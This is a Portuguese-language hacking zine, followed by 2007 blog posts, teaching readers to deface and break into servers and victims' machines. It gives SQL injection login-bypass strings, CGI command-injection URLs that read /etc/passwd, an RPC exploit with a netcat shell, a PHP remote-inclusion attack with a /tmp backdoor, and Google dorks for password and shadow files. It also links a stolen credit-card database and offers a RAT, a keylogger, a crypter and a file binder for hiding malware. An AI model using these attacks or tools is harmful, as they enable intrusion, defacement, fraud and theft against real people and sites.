/////// // X X // > Porra, o cara ja tá traçando a / \__~/ Emmanuele!!! ///// (\ \) (~) // o ( \ \ / / // > ( \ \/ /____________/ \__O ( \__/ _____\// / /( / / ______)/ ( // \ \ / / ( ) \ () \ \O/ ` \ ) ) ) ) / / ( _ / /_ (____> (____> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Para entender essa zine você deve ter noção de IP (uehauea falano assim é até engraçado mas esse texto é beeeeeeeem básico), um pouco de DOS e linux e principalmente, ESQUEÇA DE UMA VEZ POR TODAS ESSE NEGOCIO DE INVADIR COMPUTADORES PESSOAIS, estamos falando de servidores http.O que é um deface? Ato de desfigurar sites da web em diversas plataformas, substituindo a index do site pela que você desejar, normalmente inserindo nela algum protesto e seu nick. Se você não tem um nick, sugiro que crie um, pois seu nick é a sua identidade no mundo defacer.
_ ,-. / ) ( `. // /-._/ / Bom, agora vamos ao que interessa!!! `\ \ /(_/ / / / ______________________________________ ; `-` (_/ / / (_/ / Racionais Mc´s lançam seu novo CD, Nada como um dia após o outro, depois de \ Sobrevivendo no Inferno!!!!!!!!!!!! ) /` / / $$$$$$$$$
Primeiro bug que o titio The_perfect vai ensinar:Bom, como em todas as zines que eu ja vi até hoje, o primeiro bug a ser ensinado é o clássico PDW

######## # PDW # ########

nuss, a Emmanuele ta com 2 cara!!!
PDW = PASTAS DA WEBALVO = IIS 4.0 on Windows NT4, Windows 2000, Windows XP, Windows 2003 ServerNota = Iniciante
Bom, quando eu aprendi esse bug ele era tido como um bug desprezivel, já que é facílimo de ser explorado e muito antigo. Os caras que se acham "elite" não usam esse bug, mas ele tem catado muito antigamente, pois, ao contrario do que os elite de merda esperavam, o bug está presente nos windows novos e nos IIS (Internet Information Server) 4, 5 e 6.0Para explorar esse bug, você precisa de um scanner, eu sugiro o Arplhmd Group Exploit, que pode ser encontrado em http://www.arplhmd.zor.org (lá vc ve como funciona)Após achar o site vulneravel, você vai no mirc e digita: /dns ip-do-site, para ver qual é o endereço do site, tipo, www.site.comDaí voce vai em iniciar, executar e joga essa string: %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Pronto, vai abrir uma janela. Nessa janela vc coloca nova pasta da web e coloca o endereço do site que voce pegou com o scanner.Vai aparecer uma pastinha com o nome do site, daí vc entra nela e altera a index ou default, à carater do servidor.Pronto, agora coloca sua index e sai por aí gritando que você é hacker...

######### # Proxy # __ #########

Para explorar algumas falhas, usamos 0 navegador. Porem, seu IP pode ficar logado no sistema...Nossa, e agora??? Calma...Tipo, para que nosso IP não seja descoberto e a festa não acabe, vamos usar um proxy.Nossa, um PROXY!!!! maaaaaaeee, agora eu sei o que um proxy...hehehehe O que é um proxy?É um computador, um servidor à longa distancia normalmente que permite que você se conecte a ele primeiro e ele se conecta ao site, ou seja, nesse site ficará logado o IP do proxy e não o seu, sacou?? Vixi, agora eu so o SR. anonimo!!!Calma, tb naum é assim, voce tem que procurar um proxy que te deixe totalmente anônimo, pelo contrario voce pode ser pego e seu pai te deixa de castigo um mês (ou fodem vc na cadeia).Vc vai em propriedades do navegador (IE), conexões e seleciona Configurações da LAN. Aí vc procura proxy e coloca o ip do proxy que você arranjou.Depois você entra na net, tipo, normalmente quando tá mais lento é pq funcionou, mas naum vamos arriscar, entre em algum site que você conhece que mostra seu IP e faça o teste.Se aparecer o IP do proxy, é isso ae, mãos a obra.Mas The_Perfect, como eu procuro proxys???Não precisa procurar,eu sei onde tem muiiiiitos
http://www.samair.ru/proxy/ (isso vale ouro galera)
vai la...pode falar, eu so lind0!!Tipo, eu naum uso proxy, mas tipo, você usa se quiser, eu recomendo apenas para invadir sites brasileiros e tal, gringo nem dá nada.

################# # SQL Injection # (basicão) #################

ALVO: IIS 5.0 (Ruindows 2000)Nota: Iniciante-medio
Esse bug é muito legal hehuaehuaeVoce vai encontrar vários sites bugados, mas não vai conseguir ownar (possuir, usado para designar um deface) todos. Essa falha consiste em injetar comandos no banco de dados SQL obtendo privilegios de administrador.Para procurar um site vulneravel usaremos o Google (nossa, o Google??) é, isso mesmo.O diretório onde você vai injetar a string é:
/admin/index.asp/admin/default.asp
tb tem esses:/admin/adm/admin/index.asp /admin/default.asp/admin/admin.asp/admin/login.asp/admin/
entrar.asp/admin/default.asp/admin/index.asp/admin/login.asp/admin/password.asp/admin/senha.asp/login/
login.asp/adm/login.asp/adm/index.asp/adm/default.asp/admin/site/entrar.asp/ecommerce/admin/index.asp/
ecommerce/admin/default.asp/ecommerce/admin/login.asp
Existem outros mas nunca funcionou comigo... Tipo, vc vai no Google e procura por sites vulneraveis, assim: allinurl: "/admin/index.asp" ou "/admin/index.asp.Quando você achar o site vulnerável, você vai inserir a string. Deverá aparecer um campo para login e senha, daí vc coloca:
login: 'or'1 ou 'or''='senha: 'or'1 ou 'or''='
' or ' 1' or '1'='1' or 1=1--'or''='' or 'a'='a') or ('a'='a
Daí se o site estiver vulnerável você vai cair no diretório do admin, aí você procura o caminho da index e owna o site! Tipo, você tb pode faze otras coisas do tipo criar um user pra vc e etc.
Hey sandro, vc manda melhor???

####### # RPC # #######

Vários cara me pediram para não publicar tutoriais sobre esse bug, mas alguns motivos me levaram a publicar:
1- No mundo deface esse bug jé é muito conhecido;2- Todos tem direito à informação.3- Eu so bonzinho =)
RPC = Remote Procedure Call (Chamada de procedimento remoto)ALVO = Windows NT4, Win 2000, Win XP, WIn 2003 ServerNota: Good
Tipo, quem não ler isso com atenção e não buscar mais informações não vai conseguir ownar por esse bug, pq ele exige um pouco mais de atenção.O exploit usa a porta 135, então qdo vc ver algum micro com essa porta aberta vc ja fica atento...Vc pode usar o mesmo scanner que o de pdw mas com um script diferente para usar esta falha. O legal do RPC é que ele não pega apenas servidores mas tambem personal computers (mas lembre o que eu disse sobre invadir os outros)Após achar os IP´s vulneráveis, voce faz o seguinte:baixe os exploits para RPC:
http://www.facef.br/dc.zip http://www.facef.br/dc3.zip
Agora baixe o netcat, que será usado para conectar você ao computador explorado:
http://www.facef.br/nc.zip
Copie rápido os exploits, esse site eu invadi a um temp atras e uso ele como se fosse meu ftp auheuaha, copia rapido pq pode sair do ar.
Vixi, que lindo, agora você já tem tudo em mãos, vamos à prática:

***A EMMANUELE TÁ CAVALGANDO NO NEGÃOZINHO...***

Você vai entra no prompt do dos, ir até a pasta onde vc colocou os exploits e digitar o nome do exploit. Você verá que vão aparecer várias targets, daí vc escolhe a target correspondente ao sistema a ser explorado e manda bala.Se aparecer "Use the netcat to conect to server", aí que você vai usar o netcat, da seguinte forma:nc ip 44444444 é a porta que o exploit abre pra vc entrarVixi, que legau, o exploit abre uma porta pra mim???dãhhhh, no comments =se der certo, vc vai cair em C:/windows/system32se der errado, naum acontece nadaTipo, vc vai demorar um pouco pra achar computadores vulneraveis mas paciencia, vida de rhacker é dificil...EEEEEEEEEEEEEEEEEEEEEEEE, agora eu sei RPC !!!!maaaaaaaaaaee, eu so hacker agora, num conta pra ninguem!!!!

############### # PHP Website # ###############

Ohhhhhhhh, agora vamos aprender PHP Website!!!
ALVO: Linux (vixi)Nota: sUx
Tipo, essa falha é babaca, mas pra quem quiser aprende vai aí a dica:Use o Arplhmd Group Exploit que ele faz tudo pra vc :*Após achar o site vulneravel, com o mesmo scanner, voce faz o seguinte:coloca lá: www.site.com/setup (substitua o site.com pelo site vulnerável)Agora vc está no setup do site, faça o que quiser, primero crie um usuario pa vc depois entre como admin e detona tudo(PS: nunca usei isso)*Meu deus, agora eu sei hackear linux... maaaaaaaaaaaaaaeeee*
. TA COMEÇANDO OTRO FILME DA EMMANUELE!!!!!! . \./ \./ . \./ . \^.\ \\.// /.^/ \--.\ \\.// /.--/ \--. \ \\.// / .--/ \---.\ \./ /.---/ \--.\ \./ /.--/ \ .\ . /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^ ^ ^ -\_\_\- -

######## # dDoS # O Perfume de Emmanuele ########

Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foram atacados. O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada!É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque:
____________ _____ Largura de _ banda alta ---- /__________ / ___ ALVO / ________ / / ____________ _____ ____________ _____ <-- / Largura Server ___ /____________ de _ <-- VOCÊ _ \ banda alta --------- \ __________ __________ \ ___ _________ \ \ \ ____________ _____ \ Largura de _ banda alta ---- __________ ___
Nota: As máquinas de largura de banda alta são mais eficientes, mas computadores pessoais podem ser usados também.
Você deve ter perguntando antes: mas como fazer grandes números de requisições?? Simples... para isso usamos outros computadores (o que deuma certa forma nos protege, se atacássemos diretamente dos nossos seríamos descobertos rapidamente). Em um ataque DDoS usamos muitos computadores. Sevocê não quiser usar tantos computadores assim, podepraticar o ataque usando computadores de largura de banda alta, geralmente encontrados nas Universidades americanas. Desse modo será preciso poucos computadores, já que eles têm enorme poder de ataque. Algumas chegavam a ter uma largura de banda de 200 MB... você tem idéiado que significa isso? Bom.. vamos ao que interessa... O ataque funcionadessa forma: você envia um pacote à essas máquinas, elas "entendem" quedevem requisitar intermitentemente o servidor, que será o alvo. Assim,o alvo não suportará as requisições e ficará indisponibilizado. As máquinas que você deve usar para suceder o ataque devem estar infectadas com um servidor de serviço. Ou seja, você eve infectá-las, ou conseguir ips de algumas com algum amigo. Eu não estou colocando ips à disposição, pois voce vai fazer merda auauehuae. Os programas mais usados para ataques são: TFN (Tribe Flood Network), TFN2k, trin00, e agora um mais poderoso, que age em conjunto com esses: o mstream. Você pode encontrar ferramentas para praticar um ataque em: http://www.ussrback.com/distributed.htm
(PS: O desenho foi copiado de um site em inglês.) =]
~ _ ~ A Emmanuele deu até a (@#$%¨&*) fazer bico ~ ,----`-, - ) / ,--. /_/ > ) ,\__-' \ \_ \ ~~-___ ) \ \ %%%%%%%

########### # NetBios # ###########

Aee, decidi falar um pouco sobre isso que não é uma falha nem nada, tipo, não se cata servidores e nem faz-se deface. Eu coloquei isso aqui para que você possa ter uma idéia do que é e explorar esse "descuido" das pessoas. Eu acho pelomenos umas 80 máquinas vulneráveis com isso, server para você ter acesso ao computador remoto e ler as informações mais sigilosas, inserir trojans, enfim, fazer uma diversidade de coisas, isso vai da criatividade de cada um. Muitos podem me criticar por expor isso assim dessa maneira, outros podem me achar babaca, mas eu não to nem fudendo com isso não, tipo, quem achar ruim que faça melhor...Seguinte:Muitas pessoas utilizam o compartilhamento de rede do Windows, as chamadad redes Microsoft.A maioria delas, compartilha o diretorio c: inteirinho e NÃO coloca senha, naum me pergunte porque... o povo é burro memo mas essa é otra historia hehehehe.Daí você vai usar um programa milagroso chamado R3X. A maioria dos lammers tem mas não sabem como usar... é foda neh... Tipo, no site tem um tutorial de como usar esse programa, como eu naum so papai noel, vc lê o tuto e depois se tiver alguma dúvida me procura que eu esclareço...Achando ips vulneraveis ( cara isso é mtttto facil e pega mttttto) você vai no seu navegador e coloca:\\iptipo:\\192.168.0.1daí se não pedir senha, mete bronca, c:/ interinho na sua mão ou a pasta que o pato tiver compartilhado.Não há muito o que comentar sobre isso, ae, pros elite que tem fama de hacker na cidade mas só entram por compartilhamento, sinto mto mas vão ter que descobrir otra coisa uheuaheuaheua.O R3X vc acha em:http://www.invasao.com.brmete bronca =) ######## # CGI # Porra, to de saco cheio de digitar =/ ########
Exploit local root: www.bundadimel.hpg.com.br/mremap_pte
the_perfect, como que eu faço pra ownar por CGI??? cara, eu vo te falar, mas vc naum vai sair espalhando? Claro que não, pode confiar blz, to confiando hein...
Bom pra começar vc precisa de um scaner que vc ja tem, ele scaneia essa vulnerabilidade.
Então vamos ao q interessa vul de CGI é STRINGS q é um comando q vc taka assim www.site.com/strings=COMANDOS LINUX e é isso CGI...
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls
/cgi-bin/eshop.pl?seite=;ls
/scripts/calendar/calender.pl?config=cat%20/etc/passwd
/cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=/bin/id
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=/bin/ls
/cgi-bin/mailmanager.pl?setupfile=demo&page=/bin/ls
http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*
mas a q funciona mais no momento q é a vuln do scaner é a seguinte:
www.vulhost.com/arquivobugado.cgi?file=uname+-a;id
Tipo, pra explorar essas vulnerabilidades você tem que ter um mínimo conhecimento de Linux, tipo, isso vc vai atrás,acha em qualquer site sobre linux e como eu ja disse, não so papai noel...

############ #YABBSE.PHP# ############

__________________________ Falae, a zine ta ajudando hein??? ---------------------------
Tipo, só pra reforçar, o Arplhmd tem varios scripts, ou seja, ele é capaz de scanear em várias falhas, tipo, basta vc baixar o script de scan, por isso eu naum vo entrar em detalhes...
Após achar o site vulnerável, vc joga a seguinte string:
www.site.com/yabbse/Sources/Packages.php?sourcedir=www.SEUSITE.com.br/cmd.php?cmd=COMANDOS DE LINUX
Em lugar de www.SEUSITE.com.br/cmd.php você deve indicar um site onde tenha um cmd em php, isso va acha na net mas qualquer coisa eu ajudo tb.
Sacou???Nossa Java, mas aí eu tenho acesso ao sistema??? daí eu sugiro que você jogue um backdoor em /tmp (pasta onde você tem permissão pra executar arquivos no Linux) , execute o backdoor e entre por telnet ou até mesmo netcat.procure o backdoor telnetd já compilado, ae, naum tenho o endereço,mas qualquer coisa me dá um toque que eu discolo.Tipo, eu duvido que alguem que tá lendo owne por essa falha, mas tipo, se conseguir eu pago um X-tudo no komilão. =D.

#################### # Bug para Carders # ####################

[] [] [] [] [] [] [] [] [] [] [] [] [] [] []==============Carder - cartmanager================[] [] [] [] [] [] [] [] [] [] [] [] [] [] []-----------------------------------------------------------------Esses tutorias de Carder que irei publicar serão bem simples.------------------------------------------------------------------> Procurando sites bugados

O modo mais simples certamente é o Google(www.google.com) mas sevocê sabe bem de alguma linguagem de programação recomendo que façaseus próprios scans ;)Para achar sites bugados com essa falha v´no Google e digite:allinurl: cart.cgi ouallinurl: cartmanager.cgi------------------------------------------------------------------> Explorando
Modifique o site :
Exemplo: www.a1ts.com.br
.Modifique por
Exemplo: www.a1ts.com.br/cgi-bin/Admin_files/ -----------------------------------------------------------------Ps. Nunca se esquece que os MDBs e os scripts podem variar de diretorio ;) Esse txt é para aprendizado não me responsabilizo pelo que você vier a fazer.

######################### #Usando Google como scan# #########################

Realmente o google e muito util pois com alguns comandos (strings) voce podera achar coisas incriveis e muito uteis.
Alguns exemplos abaixo
allintitle: "index of/root" O google e muito util pois podera dar alguns resultados muito satisfatorios com comandos (strings)
inurl:usuarios.mdb inurl:users.mdb inurl:site.ini inurl:password.mdb inurl:orders.log
"Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index
allintitle: "index of/admin" allintitle: "index of/root" allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt inurl:admin filetype:db inurl:iisadmin inurl:"auth_user_file.txt" inurl:"wwwroot/*."
top secret site:mil confidential site:mil
allinurl: winnt/system32/ (get cmd.exe) allinurl:/bash_history
intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart

################## # Banco de dados # ##################

Lembrando: USE PROXY PELAMORDIDEUS!!!!!!
Tipo, esse banco de dados foi disponibilizado pelo nosso amigo Hualdo do grupo Shadow Boys, eu não tenho nenhum envolvimento com isso, apenas estou publicando para que voce possa entender como fuinciona o mecanismo, tipo, se você fizer merda você mesmo q vai se ferrar...Trata-se de um banco de dados com informações pessoais, incluindo cartões de crédito e senha portanto, se voce naum tiver juizo nem clique no endereço. by The_perfect
http://www27.brinkster.com/hualdoath/dados/menu_meio2.zip
__________________________________________________________________________________________________
AHHHH JAVA, JÁ ACABOU A ZINE???
Logico, pq ja acabou minha paciencia... TIPO, APOSTO QUE DEPOIS DA PUBLICAÇÃO DESSA ZINE NUMA CIDADEZINHA PORCA COMO GUAXUPÉ, VÃO APARECER ALTOS HACKERS AÍ DIZENDO QUE INVADEM TUDO E SÃO OS FODAS... TIPO, EU JA DISSE E REPITO, NÃO MECHO MAIS COM INVASÃO E ESTOU MUITO FELIZ ASSIM, E QUERIA DEIXAR BEM CLARO QUE , SEM QUERER ME EXIBIR, NÃO COLOQUEI NEM 10% DO QUE SEI SOBRE O ASSUNTO NESSE TEXTO.Ae, pros hackers fodões, tipo, se vcs são tão bons, nem precisam ler essa zine.Dae, TO LIGADO QUE VARIOS CARA VÃO LER ISSO E SAIR DIZENDO POR AÍ: o The Perfect é um bosta, eu manjo muito mais que ele auehuaheuaheuauheuae.... tipo, podecre, agora q ja leram o q EU escrevi eu so um bosta...
BOM PESSOAL, TEM MUIIIIITO MAIS, MAS DEXA PRA PRÓXIMA ZINE!!qualquer crítica,guarde pra voce...
PS: os desenhos foram feitos por uns mano meu...
The perfect =/ ah, Emmanuele foi presa =(

Hackiando Servidores

2007-12-10T14:40:00.000-08:00

Hackear Sevidores

Como Hackear Servidores de FTP Para hackear um servidor FTP, primeiro você deve saber o endereço do host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do Host: Lista de Alguns FTP's ftp.mandic.com.br ftp.bestway.com.br ftp.internetclub.com.br ftp.netscape.com ftp.angelfire.com Let's HaCk !!! Existem vários Programas de FTP'S, se não quiser saber de ftp porra nenhuma use o do DOS !!! Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br . Ao conectar ele pedirá a senha e o Password, tente user os passwords UNIX, se não der você deve entrar INVISÍVEL !!!! > Como entrar Invisível??? No login pressione ENTER, no password pressione Novamente... Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite: quote cwd ~root Pressione ENTER novamente e digite: quote pass ftp Pronto, você esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, você não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... ATENÇÃO !!!! Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção... Porra entrei, que devo fazer agora? Ao entrar você vai estar no Diretório do login, tipo \home\root\ Dai, para ver a lista de users você volta um dir vá para o dir \home\ e cada dir é um usuário,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login... Ok... se você não sabe os comandos, ai vai a dica...., se você estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!! Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser CADEIA !!! Não me responsabilizo por atos cometidos nos Hosts... o problema é de quem HaCkEiA, e não nosso, pois tome muito cuidado, e NUNCA, mas NUNCA apague NADA !!!!!

programa Omatic

2007-10-14T18:44:00.000-07:00

salve galera.. esse programa te possibilita a injeção de numeros em jogos....

como assim injeção... ?

ele modifica numeros em jogos como por exemplo dinheiro life Hp Sp etc.....

o mais incrivel ele funciona em alguns jogos online..... como por exemplo The Duel....

fassa o download e se divirta....

clique aqui

acelere sua maquina com esse programa 100% seguro

2007-09-16T09:26:00.000-07:00

ae galera....

nossa vim falar de um programa muito bom... ele acelera sua maquina surpriendentemente... lhes garanto que esse software almenta a velocidade da maquina...

eu to usando e posso disser que é otimo a unica coisa que achei estranhu é que se vc tiver usando msn os seus emotions ficam rapidos d+ imperseptiveis aos olhos humanos e é por esse motivo que eles ficam "parados" mais na verdade eles estão sendo animados rapidamente....

pode baixa que eu garanto segurança....

download:

clique aqui

dentro da pasta aonde foi descompactado esse programa ha um bloco de notas escrito serial

caso Vc não ache:
username: User ( com U nçao u)
senha: bbef3e1262fa746c

pronto...

mais uma dica... quando vc abrir o programa vai aparecer uma barrinha pra vc escolher a velocidade... eu to usando no maximo... e ta muito bom... mais caso queira baixar a velocidade é Só Vc abaixar e dar um "apply" e ja era...

caso tenha dulvidas mande seu comentario que estarie esclarecendo duvidas....

fui....

temas firefox mozilla

2007-09-15T11:21:00.000-07:00

temas para mozilla firefox
ae galera uns temas daora pra seu firefox....

to usando o black japan.... muito daora esse mais tem um monte ai é só vc escolhe um e instala e ja era.... lembrando que pra vc baixa esses temas para seu mozilla firefox presisa se cadastra.... é facil

a unica parte complicada é na hora do nome coloca seu primeiro nome e em baixo o seu sobre nome seu nick e sua senha não esqueça do seu e mail... quando o cadastro for concluido abra o e mail que eles te mandaram e valide sua conta, feito isso é só baixar e reiniciar o mozilla firefox e pronto vaita muito loko....
xD....

tema blue ice
firefox azul
clique aqui

tema redshift
firefox vermelho e preto
clique aqui

tem midnigth fox
clique aqui

firefox vista
clique aqui

noia extreme
clique aqui

ipox
clique aqui

aerofox basic
clique aqui

super mario bros
clique aqui

firehawke
clique aqui

metal lion vista
clique aqui

pink loe
para as meninas esse
clique aqui

aluminium kain 2
clique aqui

harley davidson
clique aqui

macfox 2
clique aqui

firecat oceans paws blue
clique aqui

redcats
clique aqui

picth fox dark
clique aqui

firefox default vista
clique aqui

baby blue bb
clique aqui

metal firefox
clique aqui

greenshift
clique aqui

azure fox
clique aqui

metal lion ice
clique aqui

bible fox
clique aqui

gradient sepia
clique aqui

azerty 3
clique aqui

office 3
clique aqui

metal lion brushed ice
clique aqui

black japan max
clique aqui

ifox smaragad
clique aqui

outbook 2003
clique aqui

black aqua
clique aqui

megaman 2
clique aqui

agora é só vc colokar para usar o tema e reiniciar o firefox

2007-09-09T08:30:00.000-07:00

eae galera algo novo e muito importante pra VCs...

evite de perder seu orkut instale o Noscript no seu firefox, essa ferramenta é a unica que possibilita total segurança contra ataques em seus cookie..

download

bom espero que tenham gostado dessa nova oportunidade de segurança....
só para lembrar e deixar bem claro essa ferramenta só funciona com o mozilla firefox caso não tenha o mozilla firefox baixe do nosso site a sua direita...

fui....

Cookie Monster

2007-09-08T13:10:00.000-07:00

O Cookie Monster é um aplicativo em PHP, que possui modos de captura...

um é o Orkut Mode que tem funções especiais para tratar cookies do orkut, o Modo Outros é o Modo Padrão que serve para capturar Cookies de qualquer outro site.

download:

download

Tutorial Incluso!

themida

2007-09-06T14:21:00.000-07:00

salve galera...

esse programa ai tem umas paradas bem "boas" para nós os hackers.....

ele te possibilita algo desejado a muito tempo, a invisibilidade para seus servidores seja ele de trojans keylogger e etc....

download

Video aula: Themida Versão 1.9.5 mais é a mesma coisa do 1.8

bom achu que é só isso por enquanto....

e bom ''hackeamento" pra Vcs.....

fui....

Aprenda a fazer escuta com celulares

2007-09-06T12:49:00.000-07:00

opa opa....

novidades....

quem de Vcs ja teve a vontade de fazer escultas em celulares...?

Esse tutorial te possibilita isso....

download

mas eu ainda não li ele não sei como funciona, mas se alguem souber deixe seu comentario ae

lembrando que esse tutorial é aplicativo do adobe então ele tem formato PDF caso Vc não tenha o adobe é só Vc ir no site http://www.baixaki.com.br/ e baixar o adobe tem em versão portugues...

então é só isso boa sorte pra Vcs... mais ae... escuta telefonica sem permisão da justiça é CRIME.. então tome muito cuidado .....

fui....

cactus joiner

2007-09-04T10:37:00.000-07:00

ae galera....

esse é um utilitario muito usado para a "acomodação" de um virus.....
em outras palavras ele te pssibilita juntar 2 ou mais arquivos em um só... isso mesm.... digamos que vc quera juntar um keylogger com um cavalo de troia, ou então um outro virus com um arquivo para assim ficar mais "aceitavel" para sua vitima....

então ta ai...
link download:

download

agora é só baixar e usar ele ele é bem simples de usar qualquer coisa me add no msn que eu ajudo a usar... the_perfect@ethacker.com

vo posta um video aki com o cactus e o themida....

flw galera.....

fui.....

vacina.....

2007-08-19T12:43:00.000-07:00

ae galera..... esse assunto é sério mais ao mesmo temo emgraçado...kkkkkkkkkkk.....

quem ai foi infectado pelo proprio key logger..... bom eu ja fui....kkkkkkkkkk.....

é facil é só "toma!" uma vacina....

funciona assim, vc baixa a vacina e execulta ela quando aparecer umas opcões é só colocar a opção {remove log} e ja eras.....

o link do download da vacina...

download

ja era agora é só baixa e escolher a opção serta....

caso não funcione muda a senha do seu e-mail no qual vc coloco pra receber os logs....
mais tipo, quando vc mudar a senha os outros logs que vc recebia vai extraviar tambem......

fui.........

prorat 1.9

2007-08-12T12:31:00.000-07:00

eae galera mais uma novidade pra Vcs...

prorat 1.9 é um programa que te possibilita ter controle total ha maquina da sua vitima...
mais infelismente tem uma pequena desvantagem.....
quado for baixar ele e usar vc tem que desativar seu anti-virus pois por que ele é um proprio cavalo de troia, mas não se assuste isso não interfere em nada no funcionamento de sua maquina.....

download:

download

lembrando que para o acesso é presiso digitar a senha do arquivo zip que é {pro} sem os conchetes {}.
feito isso é só desativar o seu anti-virus e usar ele

video aula do prorat 1.9

esse video é muito bom garanto que vcs vão aprender com esse "professor..." ...kkkkkkkk....
muito comedia esse professor...kkkkkk......

abraço a todos e cuidado com que vc Faz, conhecimento não é crime...

fui...

keylogger...

2007-08-12T12:11:00.000-07:00

aea galera......

O keylogger é um programa que registra tudo que é digitado, bom pra quem ta aki nesse blog é por que ja conhece do assunto mais mesmo assim vo ajuda quem naão conhece tambem...

primeiramente vo posta os links para download e videos aulas para Vcs....

download: ardamax keylogger 2.8

download

é altomatico esse download e é 100% confiavel...

video aula do ardamax keylogger 2.8

para o registro do seu keylogger vc presisa entrar no link da comunidade e pegar o "username" e o "key"
link da comunidade:

http://www.orkut.com/Community.aspx?cmm=36061574

feito isso é só usar.....

lembrando que, não me resposabilizo pelo mal uso do programa. Conhecimento não é crime.!!!

fui....